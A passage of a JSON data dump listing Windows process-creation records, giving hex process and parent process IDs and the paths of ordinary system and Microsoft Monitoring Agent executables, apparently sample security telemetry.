x1680\",\"0x1260\",\"0x23f8\",\"0x1bb4\",\"0xcfc\",\"0xdd8\",\"0x1408\",\"0x1ce8\",\"0x1d08\",\"0x1178\",\"0x1dd8\",\"0x10c4\",\"0x1a5c\",\"0x8f8\",\"0x2018\",\"0x17ec\",\"0x594\",\"0x1f88\",\"0x14d8\",\"0x1b28\",\"0xfc0\",\"0xfc8\",\"0x212c\",\"0x23a8\",\"0x1680\",\"0x23e8\",\"0x55c\",\"0xadc\",\"0x1398\",\"0x1750\",\"0x11f0\",\"0x5ac\",\"0xa90\",\"0xc4c\",\"0xb00\",\"0x154c\",\"0xeb0\",\"0x960\",\"0x158c\",\"0x1be0\",\"0x2dc\",\"0x221c\",\"0xc98\",\"0x248\",\"0x1878\",\"0x84c\",\"0x1898\",\"0x6c0\",\"0x125c\",\"0x1374\",\"0xf58\",\"0x67c\",\"0xefc\",\"0x13d8\",\"0x19e8\",\"0x7fc\",\"0x107c\",\"0x1ef4\",\"0x19f4\",\"0x2020\",\"0x918\",\"0xf20\",\"0x1008\",\"0x23ec\",\"0x2274\",\"0x1f88\",\"0x239c\",\"0x1770\",\"0xfc0\",\"0x7f8\",\"0x1860\",\"0x1dec\",\"0xb00\",\"0xeb0\",\"0x158c\",\"0x794\",\"0x458\",\"0x1b00\",\"0xb28\",\"0x634\",\"0x16a8\",\"0x1e68\",\"0xa98\",\"0x14c8\",\"0x6c0\",\"0x22c0\",\"0x2280\",\"0xccc\",\"0x67c\",\"0x878\",\"0x13d8\",\"0x1458\",\"0xa24\",\"0x1cd8\",\"0x1420\",\"0x8f8\",\"0xc5c\",\"0x1f88\",\"0x1cd8\",\"0x19d8\",\"0x1e3c\",\"0x1a9c\",\"0x1770\",\"0x1260\",\"0x55c\",\"0x115c\",\"0x2068\",\"0x11dc\",\"0x13e4\",\"0x1524\",\"0x17b0\",\"0x8c4\",\"0x2228\",\"0x1cf0\",\"0x1860\",\"0x1874\",\"0xa90\",\"0x11a8\",\"0x173c\",\"0x1910\",\"0x1db4\",\"0x438\",\"0x2018\",\"0x21c8\",\"0x2044\",\"0x2200\",\"0x1124\",\"0xd44\",\"0x1c24\",\"0x1198\",\"0x135c\",\"0xd04\",\"0x2364\",\"0x1110\",\"0x994\",\"0x2328\",\"0x6d4\",\"0x20e4\",\"0x1998\",\"0xf54\",\"0x5a8\",\"0x1db8\",\"0x1fa4\",\"0x604\",\"0x1f24\",\"0x518\",\"0x2170\",\"0x12a8\",\"0x200c\",\"0xf80\",\"0x1860\",\"0x1874\",\"0xccc\",\"0xd7c\",\"0x1634\",\"0x1748\",\"0x1898\",\"0x1eb4\",\"0x1468\",\"0x2200\",\"0x1e8c\",\"0x2348\",\"0x11f0\",\"0x1f20\",\"0x1480\",\"0x220\",\"0x980\",\"0x1704\",\"0x1520\",\"0x16cc\",\"0xfd4\",\"0x53c\",\"0xbbc\",\"0x23e8\",\"0xdf8\",\"0x1c50\",\"0x394\",\"0x105c\",\"0xd44\",\"0x994\",\"0x17e0\",\"0xa58\",\"0x1564\",\"0x1328\",\"0x1e3c\",\"0x1fa8\",\"0x12d4\",\"0x1f38\",\"0x239c\",\"0x2320\",\"0x1f3c\",\"0x11f0\",\"0x864\",\"0x8dc\",\"0x183c\",\"0xd74\",\"0x21c8\",\"0x6f8\",\"0x1c24\",\"0x1fc0\",\"0x17a4\",\"0x10bc\",\"0x1c10\",\"0xb48\",\"0x235c\",\"0xbd0\",\"0x1468\",\"0x15c8\",\"0x1278\",\"0xe34\",\"0xbc\",\"0x53c\",\"0x1834\",\"0xef4\",\"0x15f4\",\"0xcd8\",\"0xfd4\",\"0x181c\",\"0xbc\",\"0x1b28\",\"0x1d6c\",\"0x15f4\",\"0xda8\",\"0x16e0\",\"0xbb4\",\"0x11f4\",\"0x12d0\",\"0xce0\",\"0x1994\",\"0x123c\",\"0x20b0\",\"0xccc\",\"0x14ec\",\"0xda8\",\"0x1cfc\",\"0x7fc\",\"0x108c\",\"0x798\",\"0x22e0\",\"0x172c\",\"0x1dec\",\"0xe2c\",\"0x1080\",\"0xb14\",\"0x17ec\",\"0x1898\",\"0x1058\",\"0xe1c\",\"0x834\",\"0x17c4\",\"0x88c\",\"0x2e4\",\"0x108c\",\"0x1360\",\"0x19f4\",\"0x19f0\",\"0x1570\",\"0x17a8\",\"0x1058\",\"0x82c\",\"0xd44\",\"0x1bfc\",\"0x1998\",\"0x1c10\",\"0x1184\",\"0xc6c\",\"0x454\",\"0x65c\",\"0xe1c\",\"0x1070\",\"0x1ce8\",\"0xb10\",\"0x2260\",\"0x1c54\",\"0x181c\",\"0x8c0\",\"0x1f60\",\"0x123c\",\"0x518\",\"0xc98\",\"0x1cdc\",\"0x1484\",\"0xb14\",\"0x16bc\",\"0x1bb4\",\"0x1be4\",\"0xec4\",\"0xd68\",\"0xb64\",\"0x1eb4\",\"0xc98\",\"0x6f8\",\"0x84c\",\"0x1d6c\",\"0x490\",\"0x16d4\",\"0xa2c\",\"0x65c\",\"0x12fc\",\"0xd78\",\"0x221c\",\"0x1238\",\"0x1584\",\"0x7c8\",\"0x1420\",\"0x20e4\",\"0x9ac\",\"0x1078\",\"0x1ea8\",\"0x1a44\",\"0x15b8\",\"0x1da8\",\"0x99c\",\"0x974\",\"0x2280\",\"0x205c\",\"0x1360\",\"0x11d4\",\"0xaec\",\"0x1cc4\",\"0x220c\",\"0xc14\",\"0x1f24\",\"0x1b74\",\"0x1620\"],\"NewProcessId_par\":[\"NaN\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0xe24\",\"0x8f0\",\"0xe24\",\"0x1158\",\"0x1158\",\"0xe24\",\"0x20b4\",\"0xe24\",\"0x22c0\",\"0xe24\",\"0x1af0\",\"0x1af0\",\"0xe24\",\"0x644\",\"0xe24\",\"0x1290\",\"0xe24\",\"0x2274\",\"0xe24\",\"0x91c\",\"0xe24\",\"0xf10\",\"0xe24\",\"0x1a00\",\"0xe24\",\"0xe10\",\"0xe10\",\"0xe10\",\"0xe24\",\"0x12f8\",\"0xe24\",\"0xbd8\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x8c4\",\"0xe24\",\"0xb10\",\"0xe24\",\"0x17e0\",\"0xe24\",\"0x15b8\",\"0xe24\",\"0xec0\",\"0xe24\",\"0xdd0\",\"0xe24\",\"0x22dc\",\"0xe24\",\"0x838\",\"0xe24\",\"0xe2c\",\"0xe24\",\"0x16e0\",\"0xe24\",\"0x1c84\",\"0xe24\",\"0x1b64\",\"0xe24\",\"0x690\",\"0xe24\",\"0x1c20\",\"0xe24\",\"0x1280\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1584\",\"0xe24\",\"0x490\",\"0xe24\",\"0xfc0\",\"0xe24\",\"0xa14\",\"0xe24\",\"0x1ce4\",\"0xe24\",\"0xcc8\",\"0xe24\",\"0x8f8\",\"0xe24\",\"0x1614\",\"0xe24\",\"0x1850\",\"0xe24\",\"0x1610\",\"0xe24\",\"0x1080\",\"0xe24\",\"0x1248\",\"0xe24\",\"0x1044\",\"0xe24\",\"0xf08\",\"0xe24\",\"0xa78\",\"0xe24\",\"0xd74\",\"0xe24\",\"0x23d8\",\"0xe24\",\"0x3f8\",\"0xe24\",\"0x23b8\",\"0xe24\",\"0x1548\",\"0xe24\",\"0x10a8\",\"0xe24\",\"0x5a8\",\"0xe24\",\"0xf88\",\"0xe24\",\"0x18b8\",\"0xe24\",\"0x16e8\",\"0xe24\",\"0x1d04\",\"0xe24\",\"0xda8\",\"0xe24\",\"0x1f20\",\"0xe24\",\"0xe3c\",\"0xe24\",\"0x1fa4\",\"0xe24\",\"0x220c\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1570\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x154c\",\"0xe24\",\"0xc60\",\"0xe24\",\"0x638\",\"0xe24\",\"0x15fc\",\"0xe24\",\"0x1d38\",\"0xe24\",\"0x17b0\",\"0xe24\",\"0x17d0\",\"0xe24\",\"0x1fd0\",\"0xe24\",\"0x2120\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"NaN\",\"0x798\",\"0x14ec\",\"NaN\",\"0xb3c\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xd74\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x2368\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x2080\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1be0\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1928\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xb3c\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0xb3c\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xd60\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x53c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x16e8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x21b0\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x1f7c\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0xb3c\",\"0x1454\",\"0x1454\",\"0x1844\",\"0xb3c\",\"0xb3c\",\"0x1ef4\",\"0xb3c\",\"0x1d3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x594\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x23d8\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x634\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x12e0\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1f60\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xfc8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xadc\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xeb0\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x107c\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xc5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0xd44\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"NaN\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"NaN\",\"0x864\",\"0x8dc\",\"0x864\",\"0xd74\",\"0x864\",\"0x6f8\",\"0x864\",\"0x1fc0\",\"0x864\",\"0x10bc\",\"0x864\",\"0xb48\",\"0x864\",\"0xbd0\",\"0x864\",\"0x15c8\",\"0x864\",\"0xe34\",\"0x864\",\"0x53c\",\"0x864\",\"0xef4\",\"0x864\",\"0xcd8\",\"NaN\",\"0x181c\",\"0xbc\",\"NaN\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\",\"NaN\",\"0x7c8\",\"0x1420\",\"0x1420\",\"0x9ac\",\"0x1078\",\"0x7c8\",\"0x1a44\",\"0x1a44\",\"0x7c8\",\"0x99c\",\"0x7c8\",\"0x7c8\",\"0x205c\",\"0x205c\",\"NaN\",\"0xaec\",\"0xaec\",\"0xaec\",\"0xc14\",\"0x1f24\",\"0xaec\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 